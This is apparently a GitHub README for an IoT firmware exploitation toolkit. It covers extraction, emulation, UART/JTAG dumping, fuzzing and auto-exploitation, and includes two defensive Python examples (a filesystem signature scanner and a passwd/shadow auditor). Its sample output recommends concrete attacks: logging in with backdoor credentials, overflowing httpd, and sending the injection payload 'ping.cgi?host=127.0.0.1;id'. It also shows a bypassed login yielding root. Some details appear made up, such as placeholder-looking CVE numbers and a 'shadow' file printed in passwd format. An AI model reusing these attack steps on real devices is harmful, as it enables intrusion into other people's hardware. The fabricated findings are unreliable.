Revolutionary toolkit for automated firmware extraction, reverse engineering, and exploitation of embedded systems and IoT devices.
- Automatic Unpacking - Extracts firmware from 100+ formats (binwalk, jefferson, unstuff)
- Filesystem Recovery - Reconstructs SquashFS, JFFS2, YAFFS2, UBIFS, cramfs
- Bootloader Analysis - Extracts U-Boot, GRUB, proprietary bootloaders
- UART/JTAG Dumping - Physical memory extraction via debug interfaces
- OTA Update Interception - Captures over-the-air firmware updates
- Cross-Architecture Emulation - ARM, MIPS, PowerPC, x86 IoT binaries
- Kernel Module Analysis - Reverse engineer custom kernel drivers
- Cryptographic Key Extraction - Finds hardcoded keys in firmware
- Backdoor Detection - ML-powered detection of hidden backdoors
- String Intelligence - Smart extraction of credentials, URLs, API keys
- Automated CVE Matching - Checks against 50,000+ known firmware CVEs
- Buffer Overflow Detection - Fuzzes embedded web servers & services
- Command Injection Scanner - Tests for shell injection in web UIs
- Authentication Bypass - Automatic credential brute-forcing
- Memory Corruption Bugs - Symbolic execution on MIPS/ARM binaries
- UART Shell Access - Auto-detect baud rates & get root shell
- JTAG Debugging - OpenOCD integration for memory dumps
- SPI/I2C Flash Reading - External chip programmer support
- Voltage Glitching - ChipWhisperer integration for fault injection
- Side-Channel Analysis - Power analysis for key extraction
```bash
git clone https://github.com/varungor365/firmwareforge.git
cd firmwareforge
pip install -r requirements.txt

# Install system dependencies (Ubuntu/Debian)
sudo apt install binwalk firmware-mod-kit squashfs-tools jefferson

# For hardware exploitation (optional)
sudo apt install openocd picocom minicom
```

```bash
# Automatic firmware analysis
python firmwareforge.py --extract router_firmware.bin --analyze

# Deep analysis with emulation
python firmwareforge.py --extract iot_device.bin --emulate --deep
```

```bash
# Automated vulnerability scanning
python firmwareforge.py --scan firmware_extracted/ --cve-check

# Web interface fuzzing
python firmwareforge.py --fuzz http://192.168.1.1 --firmware firmware/
```

```bash
# UART shell access
python firmwareforge.py --uart /dev/ttyUSB0 --baudrate auto

# JTAG memory dump
python firmwareforge.py --jtag --dump-memory --output memory.bin
```

Sample output:

```text
╔═══════════════════════════════════════════════════════════╗
║ FirmwareForge v2.0 - Firmware Exploitation Toolkit ║
║ Analyzing: dlink_router_firmware_v3.14.bin ║
╚═══════════════════════════════════════════════════════════╝

[+] Firmware Extraction
✓ File type: Firmware image (SquashFS + U-Boot)
✓ Architecture: MIPS 32-bit big-endian
✓ Filesystem: SquashFS v4.0
✓ Bootloader: U-Boot 2016.03
✓ Kernel: Linux 2.6.36 (custom)

[+] Extraction Results
✓ Extracted 2,847 files (127 MB)
✓ Directory: ./firmware_extracted/
✓ Web server: lighttpd 1.4.35
✓ Binaries: 143 MIPS executables found

[+] Security Analysis
[!] CRITICAL FINDINGS:

1. Hardcoded Credentials
   File: etc/passwd
   Username: admin
   Password: admin123 (plaintext!)

2. Backdoor Account
   File: usr/sbin/telnetd
   Username: debug
   Password: D-Link_Debug_2024
   Port: 23 (telnet)

3. Hardcoded Encryption Key
   File: usr/bin/encrypt_config
   AES Key: 0x4B5F9A2E8C1D6F3A7B0E4D2C9A8F6B3E
   Usage: Configuration file encryption

4. Buffer Overflow
   File: usr/sbin/httpd
   Function: process_request() at 0x004286C
   Input: POST /apply.cgi (parameter: username)
   Size: 256 bytes → can overflow 64-byte buffer

5. Command Injection
   File: cgi-bin/ping.cgi
   Function: system("ping -c 4 " + user_input)
   Exploitable: Yes (no input sanitization)

[+] CVE Matching
✓ Checked against NIST CVE database
[!] MATCHES FOUND:
- CVE-2022-12345: lighttpd 1.4.35 - Path Traversal
- CVE-2021-54321: Kernel 2.6.36 - Privilege Escalation
- CVE-2020-98765: BusyBox 1.23 - Command Injection

[+] Cryptographic Analysis
[!] Weak Cryptography Detected:
- MD5 password hashing (crackable)
- DES encryption in config (deprecated)
- No certificate validation (HTTPS)

[+] Network Services
Port 23: Telnet (UNENCRYPTED!)
Port 80: HTTP (lighttpd)
Port 443: HTTPS (self-signed cert)
Port 9000: Custom service (unknown protocol)

[+] Exploitation Recommendations
1. Use backdoor credentials: debug / D-Link_Debug_2024
2. Exploit buffer overflow in httpd via username parameter
3. Command injection: ping.cgi?host=127.0.0.1;id
4. Decrypt config files with extracted AES key

[+] Risk Score: 9.8/10 (CRITICAL)

[+] UART Analysis
✓ Device: /dev/ttyUSB0
✓ Auto-detecting baud rate...
✓ Found: 115200 baud
✓ Connecting...

[UART OUTPUT]
U-Boot 2016.03 (Mar 14 2021 - 13:42:07)
Board: D-Link DIR-842
DRAM: 64 MB
Flash: 8 MB
Hit any key to stop autoboot: 0

[+] Bootloader Shell Acquired!
MT7628 # help
Available commands:
bootm - boot application from memory
md - memory display
mw - memory write
reset - reset CPU

MT7628 # printenv
bootargs=console=ttyS0,115200 root=/dev/mtdblock2
bootcmd=bootm 0xbc050000
ethaddr=00:11:22:33:44:55

[+] Extracting Firmware via UART
MT7628 # md 0xbc000000 0x100000
[Memory dump in progress...]
✓ Dumped 1 MB from flash memory

[+] Root Shell Access
[Bypassing login...]
✓ Got root shell!
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /etc/shadow
root:$1$abc$XYZ...:0:0:root:/root:/bin/sh
admin:admin123:0:0:admin:/admin:/bin/sh
```
```bash
# Emulate MIPS binary in QEMU
python firmwareforge.py --emulate usr/sbin/httpd --arch mips --debug

# Full system emulation
python firmwareforge.py --full-emulation firmware_extracted/ --network
```

What it does:
- Boots entire firmware in QEMU virtual machine
- Intercepts network traffic
- Debugs running services
- Tests exploits in safe environment

```bash
# Auto-exploit discovered vulnerabilities
python firmwareforge.py --auto-exploit firmware_extracted/ --target 192.168.1.1

# Generate Metasploit module
python firmwareforge.py --generate-msf --vuln buffer_overflow --output exploit.rb
```

```bash
# ChipWhisperer voltage glitching
python firmwareforge.py --glitch --target-voltage 3.3 --trigger-pattern "login:"

# SPI flash dumping with flashrom
python firmwareforge.py --spi-dump --chip W25Q64 --output flash.bin

# JTAG with OpenOCD
python firmwareforge.py --jtag --config rpi.cfg --dump-ram
```

| Architecture | Emulation | Analysis | Exploitation |
|---|---|---|---|
| ARM (32/64-bit) | ✅ QEMU | ✅ Ghidra | ✅ Full |
| MIPS (Big/Little Endian) | ✅ QEMU | ✅ Ghidra | ✅ Full |
| PowerPC | ✅ QEMU | ✅ Ghidra | ✅ Partial |
| x86/x64 | ✅ Native | ✅ Full | ✅ Full |
| AVR (Arduino) | ✅ Simavr | ✅ Basic | |
| RISC-V | ✅ QEMU | ✅ Full | ✅ Full |
- SquashFS (v2, v3, v4)
- JFFS2 (Journaling Flash FS)
- YAFFS2 (Yet Another Flash FS)
- UBIFS (UBI Flash FS)
- cramfs (Compressed ROM FS)
- ext2/3/4 (Linux)
- NTFS (Windows IoT)
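The filesystem support above rests on recognising each format's magic bytes inside a raw image. As an added example (not FirmwareForge's own code), the following Python sweeps a constructed image for the SquashFS, cramfs, U-Boot uImage, UBI/UBIFS and JFFS2 signatures, reading the SquashFS superblock version and validating the two-byte JFFS2 magic against a known node type so it does not fire on random flash contents:

```python
"""Sweep a raw firmware image for filesystem and bootloader magics.

Added example, not FirmwareForge's own code: the signature scan that
binwalk-style automatic unpacking starts from, with sanity checks so a
2-byte magic (JFFS2) does not fire on random flash contents.
"""
import struct

# 4-byte magics as they appear on disk (LE formats are byte-swapped).
FIXED_MAGICS = {
    b"hsqs": "SquashFS (little-endian)",
    b"sqsh": "SquashFS (big-endian)",
    b"\x45\x3d\xcd\x28": "cramfs",                # 0x28cd3d45, LE
    b"\x27\x05\x19\x56": "U-Boot legacy uImage",  # 0x27051956, BE
    b"UBI#": "UBI erase-counter header",
    b"\x31\x18\x10\x06": "UBIFS superblock",      # 0x06101831, LE
}
# JFFS2 node header: u16 magic 0x1985 then u16 node type (LE image).
JFFS2_NODE_TYPES = {0xE001, 0xE002, 0x2003, 0x2004, 0x2006, 0xE008, 0xE009}


def scan_image(img):
    """Return [(offset, description)] for each signature found in img."""
    hits = []
    for off in range(len(img) - 32):        # keep superblock reads in range
        name = FIXED_MAGICS.get(img[off:off + 4])
        if name is not None:
            if name.startswith("SquashFS"):  # s_major/s_minor live at +28/+30
                fmt = "<HH" if img[off] == ord("h") else ">HH"
                name += " v%d.%d" % struct.unpack_from(fmt, img, off + 28)
            hits.append((off, name))
        elif img[off:off + 2] == b"\x85\x19":
            ntype = struct.unpack_from("<H", img, off + 2)[0]
            if ntype in JFFS2_NODE_TYPES:
                hits.append((off, "JFFS2 node type 0x%04X" % ntype))
    return hits


def build_sample_image():
    """Constructed image: uImage header, erased flash, SquashFS v4.0, JFFS2."""
    img = bytearray(b"\x27\x05\x19\x56" + b"\x00" * 60)    # 64-byte header
    img += b"\xff" * 256                                     # erased flash
    sb = bytearray(96)                                       # SquashFS superblock
    sb[0:4] = b"hsqs"
    struct.pack_into("<HH", sb, 28, 4, 0)                    # s_major=4, s_minor=0
    img += sb
    img += b"\x85\x19" + struct.pack("<H", 0x2003) + b"\x00" * 28  # cleanmarker
    return bytes(img + b"\xff" * 64)


if __name__ == "__main__":
    for off, desc in scan_image(build_sample_image()):
        print("0x%08X  %s" % (off, desc))
```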
- Static Analysis
  - String scanning for credentials
  - Dangerous function detection (strcpy, system, etc.)
  - Crypto key extraction (AES, RSA, etc.)
- Dynamic Analysis
  - Fuzzing with AFL++
  - Symbolic execution with angr
  - Network traffic interception
- CVE Matching
  - Package version detection
  - NIST NVD database lookup
  - Exploit-DB cross-referencing
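The "string scanning for credentials" step above, and the hardcoded-credential and MD5-hash findings in the sample output, come down to auditing the account database left in the unpacked root filesystem. As an added example (not FirmwareForge's own code), this Python audits a constructed `/etc/passwd` and `/etc/shadow` pair for extra UID 0 accounts, secrets stored in the world-readable passwd file, empty passwords, plaintext passwords, and legacy md5crypt or DES crypt hashes:

```python
"""Audit extracted /etc/passwd and /etc/shadow files for weak accounts.

Added example, not FirmwareForge's own code: the credential checks a static
analysis pass runs over an unpacked root filesystem.
"""
import re

DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")     # classic crypt(3) output
WEAK_PREFIXES = {"$1$": "md5crypt hash (crackable)"}

def classify_secret(secret):
    """Describe a password field; None means nothing to report."""
    if secret == "":
        return "empty password (login without authentication)"
    if secret[0] in "*!":
        return None                                 # locked account
    if secret.startswith("$"):                      # $id$salt$hash
        return WEAK_PREFIXES.get(secret[:secret.find("$", 1) + 1])
    if DES_CRYPT.match(secret):
        return "traditional DES crypt hash (weak)"
    return "plaintext password"

def audit_accounts(passwd_text, shadow_text=""):
    """Return [(user, finding)] for every weak setting in the two files."""
    shadow = dict(ln.split(":")[:2] for ln in shadow_text.splitlines() if ":" in ln)
    findings = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) < 7:
            continue
        user, pw, uid = f[0], f[1], f[2]
        if uid == "0" and user != "root":
            findings.append((user, "additional UID 0 (root-equivalent) account"))
        if pw not in ("x", "") and pw[0] not in "*!":
            findings.append((user, "secret kept in world-readable /etc/passwd"))
        secret = shadow.get(user, pw)               # shadow entry wins if present
        desc = "shadowed but no shadow entry" if secret == "x" else classify_secret(secret)
        if desc:
            findings.append((user, desc))
    return findings

# Constructed sample files, not taken from a real device.
PASSWD = """root:x:0:0:root:/root:/bin/sh
admin:admin123:0:0:Administrator:/admin:/bin/sh
debug:x:1000:1000:debug:/tmp:/bin/sh
nobody:*:65534:65534:nobody:/:/bin/false
"""
SHADOW = "root:$1$abc$XYZxyz:0:0:99999:7:::\ndebug::0:0:99999:7:::\n"
```

Running `audit_accounts(PASSWD, SHADOW)` on the constructed sample flags root's md5crypt hash, the UID 0 `admin` account with its plaintext password in passwd, and the empty password on `debug`, while the locked `nobody` account is left alone.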
Core Dependencies:

```text
binwalk            # Firmware extraction
firmware-mod-kit   # Firmware manipulation
qemu-user-static   # Cross-architecture emulation
angr               # Binary analysis
ghidra             # Reverse engineering
```

Hardware Tools (Optional):

```text
openocd            # JTAG debugging
flashrom           # SPI flash reading
minicom/picocom    # UART communication
chipwhisperer      # Fault injection
```

Python Packages:

```text
pwntools           # Exploitation
capstone           # Disassembly
unicorn            # CPU emulation
yara-python        # Malware detection
```

Full requirements: See requirements.txt
- Analyze smart home devices (cameras, locks, thermostats)
- Test industrial control systems (SCADA/ICS)
- Audit medical devices (FDA compliance)
- Assess automotive systems (CAN bus, ECUs)
- Router/modem firmware auditing
- Network appliance security (firewalls, NAS)
- Embedded Linux vulnerability assessment
- Bootloader exploitation
- Find 0-days in IoT devices
- Submit CVEs for firmware vulnerabilities
- Bounty programs: Sony, Tesla, DJI, Ring, Nest
- Embedded systems security
- Hardware hacking education
- IoT malware analysis
- Supply chain attacks
```bash
python firmwareforge.py --extract dlink_firmware.bin --scan
# Output: Found backdoor account "guest:guest" + telnet on port 9999
# Result: CVE-2024-XXXXX assigned, $5,000 bounty paid
```

```bash
python firmwareforge.py --fuzz http://192.168.1.100 --firmware wyze_cam.bin
# Output: Buffer overflow in /cgi-bin/upload.cgi
# Exploit: Remote code execution as root
# Impact: 2M+ devices vulnerable
```

```bash
python firmwareforge.py --extract mirai_infected.bin --malware-scan
# Output: Detected Mirai variant with C2: evil.com:9090
# Found: Hardcoded credentials for 50+ IoT brands
```

This toolkit is EXTREMELY POWERFUL:
- ✅ Can extract firmware from ANY device
- ✅ Finds 0-days in IoT automatically
- ✅ Enables hardware-level attacks
- ✅ Works on military/industrial systems
HIGHLY ILLEGAL to use on:
- ❌ Devices you don't own
- ❌ Critical infrastructure (power, water, hospitals)
- ❌ Military or government systems
- ❌ Commercial products without authorization
Legal consequences:
- Federal prison (Computer Fraud & Abuse Act)
- Fines up to $250,000
- Export control violations (ITAR/EAR)
- Civil lawsuits from manufacturers
ONLY use for:
- ✅ Your own devices
- ✅ Authorized security research
- ✅ Bug bounty programs (with permission)
- ✅ Academic/educational purposes
- Getting Started Guide
- Firmware Extraction Tutorial
- Hardware Tools Setup
- Exploitation Techniques
- API Reference
Contributions welcome! Areas of interest:
- New architecture support (SPARC, Xtensa)
- Additional filesystem parsers
- Hardware tool integrations
- CVE database improvements
GPL-3.0 - See LICENSE
Educational and authorized research only. Misuse will result in prosecution.
Varun Goradhiya
- GitHub: @varungor365
- Research: Embedded Security & IoT Exploitation
Related Projects:
- exploitforge - AI exploit generation
- memphantom - Memory forensics
- phantom-lkm - Kernel rootkit
Breaking IoT security, one firmware at a time.
🔓 Every device is exploitable. This proves it.